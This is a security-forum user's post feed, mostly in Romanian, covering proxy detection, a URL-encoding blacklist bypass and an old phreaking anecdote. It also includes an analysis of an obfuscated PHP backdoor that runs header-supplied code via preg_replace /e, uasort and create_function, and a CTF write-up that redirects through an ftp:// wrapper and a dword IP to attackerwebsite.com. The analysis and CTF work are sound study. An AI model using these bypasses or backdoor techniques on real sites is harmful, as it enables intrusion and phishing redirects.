mah_one
-
Posts
422 -
Joined
-
Last visited
-
Days Won
5
mah_one's Achievements
-
#samibap**a Deci nu credeam ca mai exista un alt nivel dupa cel stabilit de "Team Code"!
-
Eu nu as incerca asta. Rata sa le gasesti creste, dar deja faci scan si e cam ilegal.
-
Ce ti-au aratat mai sus e valabil dar partial.... Problema este ca nu toate proxy-urile seteaza acel parametru de X-Forwarded-For, etc. Si daca nu ai acei parametrii, nu exista o modalitate sa fi sigur ca un ip e proxy sau nu! Dar poti sa te prinzi daca cineva foloseste un anume proxy, spre exemplu "server1.kproxy.com", asta care l-ai dat tu.
-
Da, dar probabil au un blacklist si pentru %25%30%30 se prind de caz, dar pentru %%30%30 nu se mai prind:D
-
Tocmai ce a trecut Seccon si acolo era un task ce seamana cu asta (aveti writeup). Trebuie sa va iasa un qr code si sa il scanati. Desigur, asta e partea cea mai usoara.
-
Cred ca se putea face upload cu vulnerabilitatea aia, sper ca le va zice celor de la google sa reconsidere problema si sa ia in considerare un RCE....
-
Este aceeasi problema, poate au reparat si au facut revert la ce aveau inainte.... S-a mai intamplat si cu facebook o faza de genul.
-
"Nu inteleg. Tu ai un XSS in domeniul www . paypal . com, nu vad niciun motiv pentru care sa nu-l poti folosi pentru a face plati, dar descrii riscul ca fiind "reflected file download" sau "open redirect"? Hai ma... pe bune?" -->> a vrut sa zica ca nu poti sa faci ceva fara user interaction, cred ca trebuie reformulat putin... L-am gasit in timp ce eram la servici (ma lasa sa caut, dar cu conditia sa publice ei si mi se pare fair...). In ceea ce priveste problema, nu era doar XSS, ideea e ca puteai manipula ciphertext-ul astfel incat sa returneze exe-uri sau alta extensie...
-
Done! Cititi mai sus...
-
Sa nu il trimiti necriptat. Fa o arhiva, pune o parola si trimitel prin PM lui Che. Te va ajuta garantat.
-
Asta cu manual sau automat, nu stiu sa iti spun. La cat de mic e, pot sa il fac manual, dar decat sa il fac manual mai bine fac ceva automat si sa nu ma mai chinuiesc a doua oara.
-
M-am uitat aseara pe cod... E un backdoor si nimic mai mult! Am facut un dump la variabile: [fOnyYqpwzsk] => D@ [Zd8_Y] => swro}u [lX] => ml= [WKlp] => O 4SK+ [X8] => CLV@;- [OtA] => 6-%/IY [Blc] => csse}_gyll [eI6dnDa] => }vvky_no}~ [HqtJnJ] => gvuute_nuns|oon [FiFo8Ahhl] => c{gk}u_vungvioo [xqrzKk] => 5edd955dda36ed6a2a3ac67de0c01d [wuzqhZOqm9m] => /e [y9Y] => 1255639 [T1_] => 9 [vYUf] => HTT [Fy] => P_ [FBM] => A [JU0_r] => b7 [r6g] => a [AZWsev] => mh [j6BbT5ea] => F [i4148QjXMMi] => bMvF [hg8l] => HTTP_X_DEVICE_USER_A [IT] => GEN [Q4M] => T [VZjjeswS] => strcmp [by] => md5 [KJQOFrw] => getenv [Z82] => preg_replace [R18uq] => uasort [sGn_zAlOrfM] => array_fill [u0sX] => create_function Apoi ajunge la if(strcmp(md5(getenv(HTTP_A)),'5edd955dda36ed6a2a3ac67de0c01d')) Acolo verifica parola care o ia din header-ul "A". Daca parola e buna se face un preg_replace cu datele de la user folosind -> "/e" (acesta e un backdoor). Daca nu ai preg_replace, mai incearca un create_function cu datele din "HTTP_X_DEVICE_USER_AGENT". In principiu si-a lasat 3 metode prin care executa cod php: preg_replace uasort -> folosind call_back_function create_function
-
Stiu ca prin 2000 - 2003 sunai la un numar: 080080808, erau mai multe combinatii. Dupa ce formai acel numar incepeai sa fluieri tare pana iti venea tonul, iar apoi sunai la ce numar doreai (nu stiu daca era cu taxa inversa sau era gratis apelul....).
-
There are other ways to solve that challenge, like Stealth said in the replay above, there is a way to inject \r\n. That challenge is very easy, more easy than I or Stealth explained. Keep looking, the easiest solution wasn't spoiled so far.
-
I will start with Level 13. At Level 13 I have to redirect the user to another website using the URL: http://ctf.infosecinstitute.com/ctf2/exercises/ex13.php?redirect=ex13-task.php //Edited The problem is that you can't use "http://" at the beginning of the word you send as value to parameter "redirect". Most probably there is a blacklist and I have to bypass it. There is a quick solution to bypass this inconvenient, but I will let others to think at it. I choose to explain a method to redirect anyone to anything using ftp wrapper. After several attempts to bypass the mechanism that prevents me from using certain words I managed to find that I can use "ftp" wrapper. So here's my writeup. If I load the link: http://ctf.infosecinstitute.com/ctf2/exercises/ex13.php?redirect=ftp://attackerwebsite.com/file The web application redirects me at ftp://attackerwebsite.com/file. From the ftp page I have to make another redirect to a webserver "http://attackerwebsite.com/". For doing this I used a script made in python to emulate an ftp server and for any request to the ftp server the script will return same file always without authentication. Start the python script: Having the ftp server up, the question is what should I return back in the victim browser? On a page that loads an ftp file, the browser will not execute javascript like <script>JAVASCRIPT CODE THAT REDIRECTS THE VICTIM ON ANOTHER PAGE</script>, but will interpret html tags. To make another redirection from ftp page to attackerwebsite.com I have to use the following html code inside of '/tmp/test' file: <html><meta http-equiv="refresh" content="0;URL='http://attackerwebsite.com/'" /></html> Having all ready let's try to make an redirection on https://attackerwebsite.com/ Load in a tab the following link: http://ctf.infosecinstitute.com/ctf2/exercises/ex13.php?redirect=ftp://1758432401/file ftp://1758432401/file is same with http://104.207.140.145/ (dword representation) My python script responded with the file located in '/tmp/test' "[i 15-06-24 07:46:38] x.x.104.6:20970-[anonymous] RETR /tmp/test completed=1 bytes=301 seconds=0.002" In browser the html code <html><meta http-equiv="refresh" content="0;URL='http://attackerwebsite.com/'" /></html> redirected me to attackerwebsite.com